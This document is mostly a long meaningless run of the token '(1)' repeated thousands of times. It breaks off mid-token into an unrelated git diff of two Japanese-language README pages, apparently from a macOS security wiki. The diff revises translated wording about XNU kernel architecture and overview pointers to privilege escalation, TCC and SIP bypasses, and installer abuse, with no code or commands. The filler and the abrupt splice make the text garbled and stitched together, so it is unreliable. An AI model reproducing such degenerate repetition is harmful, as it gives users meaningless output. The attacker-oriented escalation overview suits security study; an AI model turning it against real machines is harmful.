(1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) ( diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/README.md index b1af7315f..2010f3b63 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/README.md @@ -8,29 +8,34 @@ macOSに不慣れな場合は、macOSの基本を学び始めるべきです: - 特殊なmacOS **ファイルと権限:** + {{#ref}} macos-files-folders-and-binaries/ {{#endref}} - 一般的なmacOS **ユーザー** + {{#ref}} macos-users.md {{#endref}} - **AppleFS** + {{#ref}} macos-applefs.md {{#endref}} -- k**ernel**の**アーキテクチャ** +- **カーネル**の**アーキテクチャ** + {{#ref}} mac-os-architecture/ {{#endref}} -- 一般的なmacOS n**etworkサービスとプロトコル** +- 一般的なmacOS n**ネットワークサービスとプロトコル** + {{#ref}} macos-protocols.md @@ -41,7 +46,8 @@ macos-protocols.md ### MacOS MDM -企業の**macOS**システムは、**MDMで管理される**可能性が非常に高いです。したがって、攻撃者の視点からは、**それがどのように機能するか**を知ることが興味深いです: +企業では、**macOS**システムはMDMで**管理される**可能性が非常に高いです。したがって、攻撃者の視点からは、**それがどのように機能するか**を知ることが興味深いです: + {{#ref}} ../macos-red-teaming/macos-mdm/ @@ -49,12 +55,14 @@ macos-protocols.md ### MacOS - 検査、デバッグ、ファジング + {{#ref}} macos-apps-inspecting-debugging-and-fuzzing/ {{#endref}} ## MacOS Security Protections + {{#ref}} macos-security-protections/ {{#endref}} @@ -68,13 +76,14 @@ macos-security-protections/ - 使用されたファイルはすでにユーザーによって作成されている(ユーザーが所有) - 使用されたファイルはグループのためにユーザーによって書き込み可能 -- 使用されたファイルはユーザーが所有するディレクトリ内にある(ユーザーがファイルを作成できる) -- 使用されたファイルはrootが所有するディレクトリ内にあるが、ユーザーはグループのために書き込みアクセスを持っている(ユーザーがファイルを作成できる) +- 使用されたファイルはユーザーが所有するディレクトリ内にある(ユーザーはファイルを作成できる) +- 使用されたファイルはrootが所有するディレクトリ内にあるが、ユーザーはグループのために書き込みアクセスを持っている(ユーザーはファイルを作成できる) -**rootによって使用される**ファイルを**作成する**ことができると、ユーザーはその**内容を利用する**ことができたり、別の場所を指す**シンボリックリンク/ハードリンク**を作成することができます。 +**rootによって使用される**ファイルを**作成できる**ことは、ユーザーがその**内容を利用する**ことを可能にし、さらには**シンボリックリンク/ハードリンク**を作成して別の場所を指すこともできます。 この種の脆弱性については、**脆弱な`.pkg`インストーラーを確認することを忘れないでください**: + {{#ref}} macos-files-folders-and-binaries/macos-installers-abuse.md {{#endref}} @@ -83,23 +92,25 @@ macos-files-folders-and-binaries/macos-installers-abuse.md ファイル拡張子によって登録された奇妙なアプリは悪用される可能性があり、異なるアプリケーションが特定のプロトコルを開くために登録されることがあります。 + {{#ref}} macos-file-extension-apps.md {{#endref}} ## macOS TCC / SIP 権限昇格 -macOSでは、**アプリケーションやバイナリが**フォルダや設定にアクセスする権限を持つことができ、他のものよりも特権的になります。 +macOSでは、**アプリケーションとバイナリがフォルダや設定にアクセスする権限を持つ**ことがあり、これにより他のものよりも特権が与えられます。 したがって、macOSマシンを成功裏に侵害したい攻撃者は、**TCC権限を昇格させる**必要があります(または、ニーズに応じて**SIPをバイパスする**必要があります)。 -これらの権限は通常、アプリケーションが署名されている**権利**の形で与えられるか、アプリケーションがいくつかのアクセスを要求し、**ユーザーがそれらを承認した後**に**TCCデータベース**に見つけることができます。プロセスがこれらの権限を取得する別の方法は、**その権限を持つプロセスの子プロセス**であることです。これらの権限は通常**継承されます**。 +これらの権限は通常、アプリケーションが署名されている**権利**の形で与えられるか、アプリケーションがいくつかのアクセスを要求し、**ユーザーがそれらを承認した後**に**TCCデータベース**に見つかります。プロセスがこれらの権限を取得する別の方法は、これらの**権限**を持つプロセスの**子プロセス**であることです。これらは通常**継承されます**。 -これらのリンクをたどって、TCCでの[**権限昇格の異なる方法**](macos-security-protections/macos-tcc/index.html#tcc-privesc-and-bypasses)、[**TCCをバイパスする方法**](macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html)、および過去に[**SIPがバイパスされた方法**](macos-security-protections/macos-sip.md#sip-bypasses)を見つけてください。 +これらのリンクをたどって、[**TCCでの権限昇格のさまざまな方法**](macos-security-protections/macos-tcc/index.html#tcc-privesc-and-bypasses)、[**TCCをバイパスする方法**](macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html)、および過去に[**SIPがバイパスされた方法**](macos-security-protections/macos-sip.md#sip-bypasses)を見つけてください。 ## macOS 伝統的権限昇格 -もちろん、レッドチームの視点からは、rootに昇格することにも興味があるべきです。以下の投稿をチェックして、いくつかのヒントを得てください: +もちろん、レッドチームの視点からは、rootに昇格することにも興味があるはずです。いくつかのヒントについては、以下の投稿を確認してください: + {{#ref}} macos-privilege-escalation.md diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md index df4d64899..d08b366c3 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md @@ -4,9 +4,9 @@ ## XNU Kernel -macOSの**コアはXNU**であり、"X is Not Unix"の略です。このカーネルは基本的に**Machマイクロカーネル**(後で説明します)と**Berkeley Software Distribution(BSD)**の要素で構成されています。XNUはまた、**I/O Kitというシステムを介してカーネルドライバのプラットフォームを提供します**。XNUカーネルはDarwinオープンソースプロジェクトの一部であり、**そのソースコードは自由にアクセス可能です**。 +macOSの**コアはXNU**であり、これは「X is Not Unix」の略です。このカーネルは基本的に**Machマイクロカーネル**(後で説明します)と**Berkeley Software Distribution(BSD)**の要素で構成されています。XNUはまた、**I/O Kitというシステムを介してカーネルドライバのプラットフォームを提供します**。XNUカーネルはDarwinオープンソースプロジェクトの一部であり、**そのソースコードは自由にアクセス可能です**。 -セキュリティ研究者やUnix開発者の視点から見ると、**macOS**は**FreeBSD**システムに非常に**似ている**と感じるかもしれません。洗練されたGUIと多数のカスタムアプリケーションがあります。BSD向けに開発されたほとんどのアプリケーションは、macOS上で修正なしにコンパイルおよび実行できます。Unixユーザーに馴染みのあるコマンドラインツールはすべてmacOSに存在します。しかし、XNUカーネルがMachを組み込んでいるため、従来のUnixライクなシステムとmacOSの間にはいくつかの重要な違いがあり、これらの違いが潜在的な問題を引き起こしたり、独自の利点を提供したりする可能性があります。 +セキュリティ研究者やUnix開発者の視点から見ると、**macOS**は**FreeBSD**システムに非常に**似ている**と感じることがあります。洗練されたGUIと多数のカスタムアプリケーションを備えています。BSD向けに開発されたほとんどのアプリケーションは、macOS上で修正なしにコンパイルおよび実行できます。Unixユーザーに馴染みのあるコマンドラインツールはすべてmacOSに存在します。しかし、XNUカーネルがMachを組み込んでいるため、従来のUnixライクなシステムとmacOSの間にはいくつかの重要な違いがあり、これらの違いは潜在的な問題を引き起こすか、独自の利点を提供する可能性があります。 XNUのオープンソース版: [https://opensource.apple.com/source/xnu/](https://opensource.apple.com/source/xnu/) @@ -14,7 +14,7 @@ XNUのオープンソース版: [https://opensource.apple.com/source/xnu/](https Machは**UNIX互換**のために設計された**マイクロカーネル**です。その主要な設計原則の1つは、**カーネル**空間で実行される**コード**の量を**最小限に抑え**、ファイルシステム、ネットワーキング、I/Oなどの多くの典型的なカーネル機能を**ユーザーレベルのタスクとして実行できるようにすること**でした。 -XNUでは、Machはカーネルが通常処理する多くの重要な低レベル操作、例えばプロセッサスケジューリング、マルチタスク、仮想メモリ管理を**担当しています**。 